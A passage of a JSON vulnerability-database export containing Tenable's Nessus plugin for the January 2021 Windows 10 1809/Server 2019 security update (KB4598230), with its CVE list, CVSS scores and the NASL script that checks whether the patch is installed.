CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Windows Event Tracing Elevation of Privilege Vulnerability (CVE-2021-1662)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Windows Projected File System FS Filter Driver Information Disclosure Vulnerability This CVE ID is unique\n from CVE-2021-1663, CVE-2021-1670. (CVE-2021-1672)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Kernel Elevation of Privilege Vulnerability (CVE-2021-1682)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows WLAN Service Elevation of Privilege Vulnerability (CVE-2021-1646)\n\n - Windows Docker Information Disclosure Vulnerability (CVE-2021-1645)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1683,\n CVE-2021-1684. (CVE-2021-1638)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. (CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 6, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "KB4598230: Windows 10 Version 1809 and Windows Server 2019 January 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1667", "CVE-2021-1684", "CVE-2021-1682", "CVE-2021-1681", "CVE-2021-1676", "CVE-2021-1679", "CVE-2021-1700", "CVE-2021-1710", "CVE-2021-1666", "CVE-2021-1685", "CVE-2021-1638", "CVE-2021-1687", "CVE-2021-1664", "CVE-2021-1697", "CVE-2021-1702", "CVE-2021-1693", "CVE-2021-1669", "CVE-2021-1673", "CVE-2021-1662", "CVE-2021-1701", "CVE-2021-1688", "CVE-2021-1642", "CVE-2021-1650", "CVE-2021-1699", "CVE-2021-1656", "CVE-2021-1704", "CVE-2021-1655", "CVE-2021-1653", "CVE-2021-1695", "CVE-2021-1648", "CVE-2021-1654", "CVE-2021-1678", "CVE-2021-1670", "CVE-2021-1689", "CVE-2021-1668", "CVE-2021-1694", "CVE-2021-1645", "CVE-2021-1680", "CVE-2021-1661", "CVE-2021-1649", "CVE-2021-1651", "CVE-2021-1708", "CVE-2021-1672", "CVE-2021-1683", "CVE-2021-1659", "CVE-2021-1709", "CVE-2021-1652", "CVE-2021-1637", "CVE-2021-1686", "CVE-2021-1658", "CVE-2021-1671", "CVE-2021-1663", "CVE-2021-1690", "CVE-2021-1660", "CVE-2021-1646", "CVE-2021-1706", "CVE-2021-1696", "CVE-2021-1665", "CVE-2021-1674", "CVE-2021-1657", "CVE-2021-1705"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598230.NASL", "href": "https://www.tenable.com/plugins/nessus/144887", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144887);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/12\");\n\n script_cve_id(\n \"CVE-2021-1637\",\n \"CVE-2021-1638\",\n \"CVE-2021-1642\",\n \"CVE-2021-1645\",\n \"CVE-2021-1646\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1651\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1662\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1669\",\n \"CVE-2021-1671\",\n \"CVE-2021-1672\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1680\",\n \"CVE-2021-1681\",\n \"CVE-2021-1682\",\n \"CVE-2021-1683\",\n \"CVE-2021-1684\",\n \"CVE-2021-1685\",\n \"CVE-2021-1686\",\n \"CVE-2021-1687\",\n \"CVE-2021-1688\",\n \"CVE-2021-1689\",\n \"CVE-2021-1690\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1697\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1705\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0015\");\n script_xref(name:\"MSKB\", value:\"4598230\");\n script_xref(name:\"MSFT\", value:\"MS21-4598230\");\n script_xref(name:\"IAVA\", value:\"2021-A-0022\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023\");\n\n script_name(english:\"KB4598230: Windows 10 Version 1809 and Windows Server 2019 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1685. (CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1680. (CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Windows Event Tracing Elevation of Privilege Vulnerability (CVE-2021-1662)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Windows Projected File System FS Filter Driver Information Disclosure Vulnerability This CVE ID is unique\n from CVE-2021-1663, CVE-2021-1670. (CVE-2021-1672)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Kernel Elevation of Privilege Vulnerability (CVE-2021-1682)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows WLAN Service Elevation of Privilege Vulnerability (CVE-2021-1646)\n\n - Windows Docker Information Disclosure Vulnerability (CVE-2021-1645)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1683,\n CVE-2021-1684. (CVE-2021-1638)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. (CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://support.microsoft.com/en-us/help/4598230/windows-10-update-kb4598230\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b8370504\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4598230.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598230'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17763',\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598230])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-13T14:19:52", "description": "The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1685. (CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1680. (CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Windows Event Tracing Elevation of Privilege Vulnerability (CVE-2021-1662)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Windows Projected File System FS Filter Driver Information Disclosure Vulnerability This CVE ID is unique\n from CVE-2021-1663, CVE-2021-1670. (CVE-2021-1672)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Kernel Elevation of Privilege Vulnerability (CVE-2021-1682)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows 